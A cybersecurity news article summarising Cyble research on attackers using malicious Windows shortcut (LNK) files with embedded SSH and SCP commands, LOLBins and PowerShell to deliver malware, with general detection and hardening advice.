In the ever-evolving landscape of cybersecurity, the tactics employed by cyber attackers have become increasingly sophisticated. A notable trend that has emerged is the utilization of malicious LNK files, often masquerading as harmless shortcuts, in conjunction with SSH commands. This combination has garnered the attention of security experts, particularly Cyble Research and Intelligence Labs (CRIL), which has reported a marked increase in the use of LNK files as an infection vector in 2024.
The Shift in Attack Vectors: LNK Files as an Entry Point
CRIL’s investigation highlights a significant shift in the methods used by attackers, who are now leveraging LNK files to gain access to targeted systems. These shortcut files, typically designed to link to specific applications or locations on a computer, are often disguised as innocuous documents. When unsuspecting users execute these files, they trigger a series of malicious actions that can lead to the deployment of advanced malware, allowing cybercriminals to establish a foothold within the compromised environment.
This growing reliance on LNK files as a delivery mechanism reflects a broader evolution in the tactics of threat actors, who aim to circumvent traditional security measures, including antivirus programs and endpoint detection and response (EDR) solutions.
Living-Off-the-Land Binaries (LOLBins) and Evasion Techniques
Among the primary techniques employed in these LNK-based attacks is the exploitation of Living-off-the-Land Binaries (LOLBins). These trusted system binaries, which are already integrated into the operating system for legitimate purposes, can be manipulated by cybercriminals to execute harmful commands without the need for external malware. In many cases, attackers utilize various LOLBins to download or execute additional malicious payloads, further advancing their attack chain.
Despite the advancements in EDR solutions designed to detect suspicious activities involving LOLBins, attackers have refined their methods to evade detection. This underscores the necessity for organizations to adopt more sophisticated detection mechanisms capable of identifying the malicious use of trusted system utilities.
SSH Commands in Malicious LNK Files: A New Layer of Sophistication
Recent campaigns have also revealed an intriguing development: the incorporation of SSH commands within malicious LNK files. Traditionally employed for secure communication between systems, SSH commands have been weaponized by attackers to establish persistent connections, execute malicious payloads, and maintain control over compromised systems.
CRIL’s research has identified several campaigns where SSH commands, particularly those utilizing the Secure Copy Protocol (SCP), have been embedded within LNK files. This allows attackers to download malicious files from remote servers to a compromised system, where they can be executed to further the attack. The use of SSH for such operations is particularly concerning, as it is not commonly associated with Windows systems, enabling these activities to go unnoticed by conventional security measures.
Exploiting PowerShell and CMD Through SSH
In addition to file downloads via SCP, threat actors have also leveraged SSH commands to indirectly execute malicious PowerShell or CMD commands through LNK files. These commands can be configured to load and execute additional payloads or exploit other system utilities. One notable attack observed by CRIL involved a malicious LNK file that triggered a PowerShell script using an SSH command, which subsequently called mshta.exe to download a malicious payload from a remote URL. This sequence of events culminated in the deployment of harmful files on the compromised system.
Moreover, attackers have utilized cmd.exe and rundll32 commands to load and execute malicious DLL files, complicating detection efforts. In one instance, a series of commands executed via the LNK file led to the opening of a PDF document containing a lure, which, when accessed, activated malicious code.
Tactics Employed by Advanced Persistent Threat (APT) Groups
As the sophistication of these attacks continues to escalate, Advanced Persistent Threat (APT) groups are increasingly incorporating SSH-based techniques into their operations. Renowned for their targeted and long-term cyber espionage activities, these groups demonstrate a continual refinement of their attack methods through the use of LNK files and SSH commands. The Transparent Tribe, a notable APT group, has been linked to the deployment of stealer malware using similar techniques, often compiling malicious payloads in Go to enhance their stealth.
The Need for Vigilance and Enhanced Detection
The convergence of LNK files and SSH commands poses a significant threat to organizations globally. As attackers refine their strategies, it becomes imperative for security teams to implement robust monitoring and detection systems capable of identifying abnormal activities, particularly the malicious use of trusted system binaries. EDR solutions must evolve to recognize the subtle indicators of malicious SSH and SCP activity, especially in environments where SSH is not typically utilized. By closely monitoring legitimate SSH utility and restricting its use to authorized personnel, organizations can mitigate the risk of exploitation. Furthermore, disabling unnecessary features, such as OpenSSH, on systems where they are not required can help minimize the attack surface.
